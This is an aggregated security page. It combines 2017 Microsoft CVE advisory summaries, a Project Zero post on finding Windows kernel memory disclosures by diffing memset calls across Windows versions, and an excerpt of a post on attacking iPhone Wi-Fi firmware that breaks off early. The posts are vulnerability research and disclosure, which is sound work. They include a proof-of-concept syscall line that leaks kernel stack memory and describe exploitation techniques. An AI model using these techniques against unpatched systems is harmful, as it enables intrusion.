An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8462) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Win32k Elevation of Privilege Vulnerability (CVE-2017-8465) MS Rating: Important

A privilege escalation vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Win32k Elevation of Privilege Vulnerability (CVE-2017-8468) MS Rating: Important

A privilege escalation vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8469) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8470) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8471) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8472) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8473) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8474) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8475) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8476) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8477) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8478) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8479) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8480) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8481) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8482) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8483) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8484) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8485) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8488) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8489) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8490) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8491) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8492) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Cumulative Security Update for Microsoft Windows

LNK Remote Code Execution Vulnerability (CVE-2017-8464) MS Rating: Critical

A remote code execution exists in Microsoft Windows that could allow remote code execution if the icon of a specially crafted shortcut is displayed. An attacker who successfully exploited this issue could gain the same user rights as the local user.

Windows PDF Remote Code Execution Vulnerability (CVE-2017-0291) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could cause arbitrary code to execute in the context of the current user.

Windows PDF Remote Code Execution Vulnerability (CVE-2017-0292) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could cause arbitrary code to execute in the context of the current user.

Windows Remote Code Execution Vulnerability (CVE-2017-0294) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.

Windows Search Remote Code Execution Vulnerability (CVE-2017-8543) MS Rating: Critical

A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0173) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0215) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0216) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0218) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0219) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Windows Default Folder Tampering Vulnerability (CVE-2017-0295) MS Rating: Important

A tampering vulnerability exists in Microsoft Windows that could allow an authenticated attacker to modify the folder structure. An attacker who successfully exploited this issue could potentially modify files and folders that are synchronized the first time when a user logs in locally to the computer.

Windows TDX Elevation of Privilege Vulnerability (CVE-2017-0296) MS Rating: Important

A privilege escalation vulnerability exists when tdx. sys fails to check the length of a buffer prior to copying memory to it.

Windows COM Session Elevation of Privilege Vulnerability (CVE-2017-0298) MS Rating: Important

A privilege escalation exists in Windows when a DCOM object in Helppane. exe, configured to run as the interactive user, fails to properly authenticate the client.

Windows PDF Information Disclosure Vulnerability (CVE-2017-8460) MS Rating: Important

An information disclosure vulnerability exists in Microsoft Windows when a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could read information in the context of the current user.

Windows Cursor Elevation of Privilege Vulnerability (CVE-2017-8466) MS Rating: Important

A privilege escalation vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Windows Security Feature Bypass Vulnerability (CVE-2017-8493) MS Rating: Important

A security bypass vulnerability exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks, which could allow an attacker to set variables that are either read-only or require authentication.

Windows Elevation of Privilege Vulnerability (CVE-2017-8494) MS Rating: Important

A privilege escalation vulnerability exists when Windows Secure Kernel Mode fails to properly handle objects in memory.To exploit the vulnerability, a locally-authenticated attacker could attempt to run a specially crafted application on a targeted system.

Windows VAD Cloning Denial of Service Vulnerability (CVE-2017-8515) MS Rating: Important

A denial of service vulnerability exists in Microsoft Windows when an unauthenticated attacker sends a specially crafted kernel mode request. An attacker who successfully exploited this issue could cause a denial of service on the target system, causing the machine to either stop responding or reboot.

Windows Search Information Disclosure Vulnerability (CVE-2017-8544) MS Rating: Important

An information disclosure vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

GDI Information Disclosure Vulnerablity (CVE-2017-8553) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.


Using Binary Diffing to Discover Windows Kernel Memory Disclosure Bugs
7.10.2017 Google Project Zero
Vulnerebility blog

Patch diffing is a common technique of comparing two binary builds of the same code – a known-vulnerable one and one containing a security fix. It is often used to determine the technical details behind ambiguously-worded bulletins, and to establish the root causes, attack vectors and potential variants of the vulnerabilities in question. The approach has attracted plenty of research [1][2][3] and tooling development [4][5][6] over the years, and has been shown to be useful for identifying so-called 1-day bugs, which can be exploited against users who are slow to adopt latest security patches. Overall, the risk of post-patch vulnerability exploitation is inevitable for software which can be freely reverse-engineered, and is thus accepted as a natural part of the ecosystem.

In a similar vein, binary diffing can be utilized to discover discrepancies between two or more versions of a single product, if they share the same core code and coexist on the market, but are serviced independently by the vendor. One example of such software is the Windows operating system, which currently has three versions under active support – Windows 7, 8 and 10 [7]. While Windows 7 still has a nearly 50% share on the desktop market at the time of this writing [8], Microsoft is known for introducing a number of structural security improvements and sometimes even ordinary bugfixes only to the most recent Windows platform. This creates a false sense of security for users of the older systems, and leaves them vulnerable to software flaws which can be detected merely by spotting subtle changes in the corresponding code in different versions of Windows.

In this blog post, we will show how a very simple form of binary diffing was effectively used to find instances of 0-day uninitialized kernel memory disclosure to user-mode programs. Bugs of this kind can be a useful link in local privilege escalation exploit chains (e.g. to bypass kernel ASLR), or just plainly expose sensitive data stored in the kernel address space. If you're not familiar with the bug class, we recommend checking the slides of the Bochspwn Reloaded talk given at the REcon and Black Hat USA conferences this year as a prior reading [9].
Chasing memset calls
Most kernel information disclosures are caused by leaving parts of large memory regions uninitialized before copying them to user-mode; be they structures, unions, arrays or some combination of these constructs. This typically means that the kernel provides a ring-3 program with more output data than there is relevant information, for a number of possible reasons: compiler-inserted padding holes, unused structure/union fields, large fixed-sized arrays used for variable-length content etc. In the end, these bugs are rarely fixed by switching to smaller buffers – more often than not, the original behavior is preserved, with the addition of one extra memset function call which pre-initializes the output memory area so it doesn't contain any leftover stack/heap data. This makes such patches very easy to recognize during reverse engineering.

When filing issue #1267 in the Project Zero bug tracker (Windows Kernel pool memory disclosure in win32k!NtGdiGetGlyphOutline, found by Bochspwn) and performing some cursory analysis, I realized that the bug was only present in Windows 7 and 8, while it had been internally fixed by Microsoft in Windows 10. The figure below shows the obvious difference between the vulnerable and fixed forms of the code, as decompiled by the Hex-Rays plugin and diffed by Diaphora:

Figure 1. A crucial difference in the implementation of win32k!NtGdiGetGlyphOutline in Windows 7 and 10

Considering how evident the patch was in Windows 10 (a completely new memset call in a top-level syscall handler), I suspected there could be other similar issues lurking in the older kernels that have been silently fixed by Microsoft in the more recent ones. To verify this, I decided to compare the number of memset calls in all top-level syscall handlers (i.e. functions starting with the Nt prefix, implemented by both the core kernel and graphical subsystem) between Windows 7 and 10, and later between Windows 8.1 and 10. Since in principle this was a very simple analysis, an adequately simple approach could be used to get sufficient results, which is why I decided to perform the diffing against code listings generated by the IDA Pro disassembler.

When doing so, I quickly found out that each memory zeroing operation found in the kernel is compiled in one of three ways: with a direct call to the memset function, its inlined form implemented with the rep stosd x86 instruction, or an unfolded series of mov x86 instructions:

Figure 2. A direct memset function call to reset memory in nt!NtCreateJobObject (Windows 7)


Figure 3. Inlined memset code used to reset memory in nt!NtRequestPort (Windows 7)

Figure 4. A series of mov instructions used to reset memory in win32k!NtUserRealInternalGetMessage (Windows 8.1)

The two most common cases (memset calls and rep stosd) are both decompiled to regular invocations of memset() by the Hex-Rays decompiler:

Figures 5 and 6. A regular memset call is indistinguishable from an inlined rep movsd construct in the Hex-Rays view

Unfortunately, a sequence of mov's with a zeroed-out register as the source operand is not recognized by Hex-Rays as a memset yet, but the number of such occurrences is relatively low, and hence can be neglected until we manually deal with any resulting false-positives later in the process. In the end, we decided to perform the diffing using decompiled .c files instead of regular assembly, just to make our life a bit easier.

A complete list of steps we followed to arrive at the final outcome is shown below. We repeated them twice, first for Windows 7/10 and then for Windows 8.1/10:

Decompiled ntkrnlpa.exe and win32k.sys from Windows 7 and 8.1 to their .c counterparts with Hex-Rays, and did the same with ntoskrnl.exe, tm.sys, win32kbase.sys and win32kfull.sys from Windows 10.
Extracted a list of kernel functions containing memset references (taking their quantity into account too), and sorted them alphabetically.
Performed a regular textual diff against the two lists, and chose the functions which had more memset references on Windows 10.
Filtered the output of the previous step against the list of functions present in the older kernels (7 or 8.1, again pulled from IDA Pro), to make sure that we didn't include routines which were only introduced in the latest system.

In numbers, we ended up with the following results:

ntoskrnl functions
ntoskrnl syscall handlers
win32k functions
win32k syscall handlers
Windows 7 vs. 10
153
8
89
16
Windows 8.1 vs. 10
127
5
67
11
Table 1. Number of old functions with new memset usage in Windows 10, relative to previous system editions

Quite intuitively, the Windows 7/10 comparison yielded more differences than the Windows 8.1/10 one, as the system progressively evolved from one version to the next. It's also interesting to see that the graphical subsystem had fewer changes detected in general, but more than the core kernel specifically in the syscall handlers. Once we knew the candidates, we manually investigated each of them in detail, discovering two new vulnerabilities in the win32k!NtGdiGetFontResourceInfoInternalW and win32k!NtGdiEngCreatePalette system services. Both of them were addressed in the September Patch Tuesday, and since they have some unique characteristics, we will discuss each of them in the subsequent sections.
win32k!NtGdiGetFontResourceInfoInternalW (CVE-2017-8684)
The inconsistent memset which gave away the existence of the bug is as follows:


Figure 8. A new memset added in win32k!NtGdiGetFontResourceInfoInternalW in Windows 10

This was a stack-based kernel memory disclosure of about 0x5c (92) bytes. The structure of the function follows a common optimization scheme used in Windows, where a local buffer located on the stack is used for short syscall outputs, and the pool allocator is only invoked for larger ones. The relevant snippet of pseudocode is shown below:


Figure 9. Optimized memory usage found in the syscall handler

It's interesting to note that even in the vulnerable form of the routine, memory disclosure was only possible when the first (stack) branch was taken, and thus only for requested buffer sizes of up to 0x5c bytes. That's because the dynamic PALLOCMEM pool allocator does zero out the requested memory before returning it to the caller:


Figure 10. PALLOCMEM always resets allocated memory

Furthermore, the issue is also a great example of how another peculiar behavior in interacting with user-mode may contribute to the introduction of a security flaw (see slides 32-33 of the Bochspwn Reloaded deck). The code pattern at fault is as follows:

Allocate a temporary output buffer based on a user-specified size (dubbed a4 in this case), as discussed above.
Have the requested information written to the kernel buffer by calling an internal win32k!GetFontResourceInfoInternalW function.
Write the contents of the entire temporary buffer back to ring-3, regardless of how much data was actually filled out by win32k!GetFontResourceInfoInternalW.

Here, the vulnerable win32k!NtGdiGetFontResourceInfoInternalW handler actually "knows" the length of meaningful data (it is even passed back to the user-mode caller through the 5th syscall parameter), but it still decides to copy the full amount of memory requested by the client, even though it is completely unnecessary for the correct functioning of the syscall:


Figure 11. There are v10 output bytes, but the function copies the full a4 buffer size.

The combination of a lack of buffer pre-initialization and allowing the copying of redundant bytes is what makes this an exploitable security bug. In the proof-of-concept program, we used an undocumented information class 5, which only writes to the first four bytes of the output buffer, leaving the remaining 88 uninitialized and ready to be disclosed to the attacker.
win32k!NtGdiEngCreatePalette (CVE-2017-8685)
In this case, the vulnerability was fixed in Windows 8 by introducing the following memset into the syscall handler, while still leaving Windows 7 exposed:


Figure 12. A new memset added in win32k!NtGdiEngCreatePalette in Windows 8

The system call in question is responsible for creating a kernel GDI palette object consisting of N 4-byte color entries, for a user-controlled N. Again, a memory usage optimization is employed by the implementation – if N is less or equal to 256 (1024 bytes in total), these items are read from user-mode to a kernel stack buffer using win32k!bSafeReadBits; otherwise, they are just locked in ring-3 memory by calling win32k!bSecureBits. As you can guess, the memory region with the extra memset applied to it is the local buffer used to temporarily store a list of user-defined RGB colors, and it is later passed to win32k!EngCreatePalette to actually create the palette object. The question is, how do we have the buffer remain uninitialized but still passed for the creation of a non-empty palette? The answer lies in the implementation of the win32k!bSafeReadBits routine:


Figure 13. Function body of win32k!bSafeReadBits

As you can see in the decompiled listing above, the function completes successfully without performing any actual work, if either the source or destination pointer is NULL. Here, the source address comes directly from the syscall's 3rd argument, which doesn't undergo any prior sanitization. This means that we can make the syscall think it has successfully captured an array of up to 256 elements from user-mode, while in reality the stack buffer isn't written to at all. This is achieved with the following system call invocation in our proof-of-concept program:

HPALETTE hpal = (HPALETTE)SystemCall32(__NR_NtGdiEngCreatePalette, PAL_INDEXED, 256, NULL, 0.0f, 0.0f, 0.0f);

Once the syscall returns, we receive a handle to the palette which internally stores the leaked stack memory. In order to read it back to our program, one more call to the GetPaletteEntries API is needed. To reiterate the severity of the bug, its exploitation allows an attacker to disclose an entire 1 kB of uninitialized kernel stack memory, which is a very powerful primitive to have in one's arsenal.

In addition to the memory disclosure itself, other interesting quirks can be observed in the nearby code area. If you look closely at the code of win32k!NtGdiEngCreatePalette in Windows 8.1 and 10, you will spot an interesting disparity between them: the stack array is fully reset in both cases, but it's achieved in different ways. On Windows 8.1, the function "manually” sets the first DWORD to 0 and then calls memset() on the remaining 0x3FC bytes, while Windows 10 just plainly memsets the whole 0x400-byte area. The reason for this is quite unclear, and even though the end result is the same, the discrepancy provokes the idea that not just the existence of memset calls can be compared across Windows versions, but also possibly the size operands of those calls.


Figure 14. Different code constructs used to zero out a 256-item array on Windows 8.1 and 10

On a last related note, the win32k!NtGdiEngCreatePalette syscall may be also quite useful for stack spraying purposes during kernel exploitation, as it allows programs to easily write 1024 controlled bytes to a continuous area of the stack. While the buffer size is smaller than what e.g. nt!NtMapUserPhysicalPages has to offer, the buffer itself ends at a higher offset relative to the stack frame of the top-level syscall handler, which can make an important difference in certain scenarios.
Conclusions
The aim of this blog post was to illustrate that security-relevant differences in concurrently supported branches of a single product may be used by malicious actors to pinpoint significant weaknesses or just regular bugs in the more dated versions of said software. Not only does it leave some customers exposed to attacks, but it also visibly reveals what the attack vectors are, which works directly against user security. This is especially true for bug classes with obvious fixes, such as kernel memory disclosure and the added memset calls. The "binary diffing" process discussed in this post was in fact pseudocode-level diffing that didn't require much low-level expertise or knowledge of the operating system internals. It could have been easily used by non-advanced attackers to identify the three mentioned vulnerabilities (CVE-2017-8680, CVE-2017-8684, CVE-2017-8685) with very little effort. We hope that these were some of the very few instances of such "low hanging fruit" being accessible to researchers through diffing, and we encourage software vendors to make sure of it by applying security improvements consistently across all supported versions of their software.

References

http://www.blackhat.com/presentations/bh-usa-09/OH/BHUSA09-Oh-DiffingBinaries-SLIDES.pdf
https://beistlab.files.wordpress.com/2012/10/isec_2012_beist_slides.pdf
https://www.rsaconference.com/writable/presentations/file_upload/ht-t10-bruh_-do-you-even-diff-diffing-microsoft-patches-to-find-vulnerabilities.pdf
https://www.zynamics.com/bindiff.html
http://www.darungrim.org/
https://github.com/joxeankoret/diaphora
https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet
http://gs.statcounter.com/os-version-market-share/windows/desktop/worldwide
http://j00ru.vexillium.org/slides/2017/recon.pdf


Over The Air - Vol. 2, Pt. 2: Exploiting The Wi-Fi Stack on Apple Devices
7.10.2017 Google Project Zero
Vulnerebility blog

In this blog post we’ll continue our journey towards over-the-air exploitation of the iPhone, by means of Wi-Fi communication alone. This part of the research will focus on the firmware running on Broadcom’s Wi-Fi SoC present on the iPhone 7.

We’ll begin by performing a deep dive into the firmware itself; discovering new attack surfaces along the way. After auditing these attack surfaces, we’ll uncover several vulnerabilities. Finally, we’ll develop a fully functional exploit against one of the aforementioned vulnerabilities, thereby gaining code execution on the iPhone 7’s Wi-Fi chip. In addition to gaining code execution, we’ll also develop a covert backdoor, allowing us to remotely control the chip over-the-air.

Along the way, we’ll come across several new security mechanisms developed by Broadcom. While these mechanisms carry the potential to make exploitation harder, they remained rather ineffective in this particular case. By exploring the mechanisms themselves, we were able to discover methods to bypass their intended protections. Nonetheless, we remain hopeful that the issues highlighted in this blog post will help inspire stronger mitigations in the future.

All the vulnerabilities presented in this blog post (#1, #2, #3, #4, #5) were reported to Broadcom and subsequently fixed. I’d like to thank Broadcom for being highly responsive and for handling the issues in a timely manner. While we did not perform a full analysis on the breadth of these issues, a minimal analysis is available in the introduction to the previous blog post.

And now, without further ado, let’s get to it!
Exploring The Firmware

Combining the extracted ROM image we had just acquired with the resident RAM image, we can finally piece together the complete firmware image. With that, all that remains is to load the image into a disassembler and begin exploring.

While the ROM image on the BCM4355C0 is slightly larger than that of previously analysed Android-resident Wi-Fi chips, it’s still rather small (spanning only 896KB). Consequently, Broadcom has once again employed the same tricks in order to conserve as much memory as possible; including compiling the bulk of the code using the Thumb-2 instruction set and stripping away most of the symbols.

As for the ROM’s layout, it follows the same basic structure as that of its Android counterparts; beginning with a code chunk, followed by a blob of constant data (including strings and CRC polynomials), and ending with “trampolines” into detection points in the Wi-Fi firmware’s RAM (and some more spare data).

The same cannot be said of the RAM image; while some similarities exist between the current image and the previously analysed ones, their internal layouts are substantially different. Whereas Android-resident firmwares contained interspersed heap chunks between code and data blobs, this quirk is no longer present in the current RAM image. Instead, the heap chunks are mostly placed in a linear fashion. One exception to this rule is the initialisation code present in the RAM -- once the firmware’s bootup process completes, this blob is reclaimed, and is thereafter converted into an additional heap chunk.

Curiously, the stack is no longer located after the heap, but rather precedes it. This modification has the advantage of preventing potential collisions between the stack and the heap (which were possible in previous firmware versions).

To further our understanding of the firmware, let’s attempt to identify the set of supported high-level features. While ROM images typically contain a wealth of features, not all OEMs choose to utilise every single feature. Instead, the supported features are governed by the RAM’s contents, which selectively adds support for the capabilities chosen by the OEM.

In the context of Android-resident firmware images, identifying the supported features was made easier due to the inclusion of “feature tags” within the version string embedded in the firmware’s RAM image. Each tag indicated support for a corresponding feature within the firmware image. Unfortunately, the iPhone’s Wi-Fi firmware images made away with the detailed version strings, and instead opted for a generic string containing the build type and the chip’s revision:

Nevertheless, we can still gain some insight into the firmware’s feature set, by reverse-engineering the firmware itself. Let’s take a look inside and see what we can find!
It’s Bigger On The Inside

Although most symbols have been stripped from the firmware’s ROM image, whatever symbols remain hint at the features supported by the image. Indeed, going over the strings in the combined image (mostly the ROM, the RAM is nearly devoid of strings), we come across many of the features we’ve identified in the past. Surprisingly, however, we also find a great deal of new features.

While adding features can (sometimes) result in better user experience, it’s important to remember that the Wi-Fi chip is a highly privileged component.

First, as a network interface, the chip has access to all of the host’s Wi-Fi traffic (both inbound and outbound). Therefore, attackers controlling the Wi-Fi firmware can leverage this vantage point to inject or manipulate data viewed by the host. One avenue of attack would therefore be to manipulate the host’s unencrypted web traffic and insert a browser exploit, allowing attackers to gain control over the corresponding process on the host. Other applications on the host which rely on unencrypted communications may be similarly attacked.

In addition to the aforementioned attack surface, the Wi-Fi firmware itself can carry out attacks against the host. As we’ve seen in previous blog posts, the chip communicates with the host using a variety of control messages and through a privileged physical interface (e.g., PCIe); if we were to find errors in the host’s processing of any of those, we might be able to take over the host itself (indeed, we’ll carry out such attacks in the next blog post!).

Due to the above risks, it’s important that the TCB constituted by the Wi-Fi chip remain relatively small. Any components added to the Wi-Fi firmware carry the risk of vulnerabilities being introduced into the firmware which would subsequently allow attackers to assume control over the chip (and perhaps even the entire system).

This risk is compounded by the fact that the firmware employs far fewer defence mechanisms than modern operating systems. Most notably, it does not employ ASLR, does not have stack cookies and fails to implement safe heap unlinking. Therefore, even relatively weak primitives may be exploitable within the Wi-Fi firmware (in fact, we’ll see just such an example later on!).

With that in mind, let’s take a look at the features present in the Wi-Fi firmware. It’s important to note that the mere presence of these code paths in the firmware does not imply that they are enabled by default. Rather, in most cases the host chooses whether to enable specific features, depending on user or network related configurations.
Apple-Specific Features

After some preliminary exploration, we come across a group of unfamiliar strings referencing a feature called “AWDL”. This acronym refers to “Apple Wireless Direct Link”; an Apple-specific protocol designed to provide peer-to-peer connectivity, notably used by AirDrop and AirPlay. The presence of Apple-specific functionality within the ROM affirms the suspicion that these Wi-Fi chips are used exclusively by Apple devices.

From a security perspective, it appears that the attack surface exposed by this functionality within the Wi-Fi firmware is rather limited. The firmware contains mechanisms for the configuration of AWDL-related features, but such operations are driven primarily by host-side logic (via AppleBCMWLANCore and IO80211Family).

Moving right along, we come across another group of unexpected strings:

This code originates from mDNSResponder, Apple’s open-source implementation of Multicast DNS (a standardised zero-configuration service commonly used within the Apple ecosystem).

Reverse-engineering the above fragments, we come to the realisation that it is a stripped-down version of mDNSResponder, mostly responsible for performing wake on demand via mDNS (for networks that include a Bonjour Sleep Proxy). Consequently, it does not offer all the functionality provided by a fully-fledged mDNS client. Nonetheless, embedding code from complex libraries such as mDNSResponder could carry undesired side effects.

For starters, mDNSResponder itself has been affected by several security issues in the past. More subtly, non-security bugs in libraries can become security-relevant when migrating between systems whose characteristics differ so widely from one another. Concretely, on the Wi-Fi chip address zero points to the firmware’s interrupt vectors -- a mapped, writable address. Being able to modify this address would allow attackers to gain code-execution on the chip, thereby converting a class of “benign” bugs, such as a null-pointer accesses, to RCEs.

Offloading Mechanisms

Since the Wi-Fi SoC’s ARM core is less power-hungry than the application processor, it stands to reason that some network related functionality be relegated to the firmware, when possible. This concept is neither new, nor is it unique to the mobile settings; offloading to the NIC occurs in desktop environments as well, primarily in the form of TCP offloading (via TOE) .

Regardless, while the advantages of offloading are clear, it’s important to be aware of the potential downsides as well. For starters, as we’ve mentioned before, the more features are added into the Wi-Fi firmware, the less auditable it becomes. Additionally, offloading features often require parsing of high-level protocols. Since the Wi-Fi firmware does not contain its own TCP/IP stack, it must resort to parsing all layers in the stack manually, up to the layer at which the offloading occurs.

Inspecting the firmware reveals at least two features which allow offloading of high-level protocols to the Wi-Fi firmware: ICMPv6 offloading and TCP KeepAlive offloading. Apple’s host-side drivers contain controls for enabling and disabling these offloading features (see AppleBCMWLANCore), subsequently handing over control over these packets to the Wi-Fi firmware rather than the host.

While beyond the scope of this blog post, auditing both of the aforementioned offloading features revealed two security bugs allowing attackers to either leak constrained data from the firmware or to crash the firmware running on the Wi-Fi SoC (for more information see the bug tracker entries linked above).
Generic Attack Surfaces

While the aforementioned attack surfaces may be interesting from an exploratory point of view, each of the outlined features was rather constrained in scope. Perhaps, we could find a more fruitful attack surface within the Wi-Fi firmware?

...This is where some familiarity with the Wi-Fi standards comes in handy!

Wi-Fi frames can be split into three distinct categories. Each frame is assigned a category by inspecting the “type” and “subtype” fields in its MAC header:

The categories are as follows:

Data Frames - Carry data (and QoS data) over the Wi-Fi network.
Control Frames - Body-less frames assisting with the delivery of other frames (using ACKs, RTS/CTS, Block ACKs and more).
Management Frames - Perform complex operations, including connecting to a network, modifying the state of individual stations (STAs), authenticating and more.

Let’s take a second to consider the categories above from a security PoV.

While data frames contain interesting attack surfaces (such as frame aggregation via A-MSDU/A-MPDU), they hide little complexity otherwise. Conversely, features present directly on the RX-path, such as the aforementioned offloading mechanisms, are generally also accessible through data frames, thereby increasing the exposed attack surface. Control frames, on the other hand, offer limited complexity and therefore do not significantly contribute to the attack surface.

Unlike the first two categories, management frames are where the majority of the firmware’s complexity lays. Many of the mechanisms encapsulated by management frames make for interesting targets in their own right; including authentication and association. However, we’ll choose to focus on one subtype offering the largest attack surface of all -- Action Frames.

Most of the logic behind “advanced” Wi-Fi features (such as roaming, radio measurements, etc.) is implemented by means of Action Frames. As their name implies, these frames trigger “actions” in stations within the network, potentially modifying their state.

Curiously, unlike data frames, management frames (and therefore action frames as well) are normally unencrypted, even if networks employ security protocols such as WPA/WPA2. Instead, certain management frames can be encrypted by enabling 802.11w Protected Management Frames. When enabled, 802.11w allows for confidentiality of those frames’ contents, as well as a form of replay protection.

Summing up, action frames constitute a large portion of the attack surface -- they are mostly unprotected frames, using which state-altering functionality is carried out. To discover the exact extent of their exposed attack surface, let’s explore those frames in more depth.
Action Frames

Consulting IEEE 802.11-2016 (9-47), full list of action frame categories is quite formidable:

To illustrate the amount of complexity encapsulated by action frames, let’s return to the iPhone’s Wi-Fi firmware. Tracing our way through the RX-path, we quickly reach the function at which action frames are handled within the firmware (referred to as “wlc_recv_mgmtact” in the ROM):


wlc_recv_mgmtact - 0x1A79F4

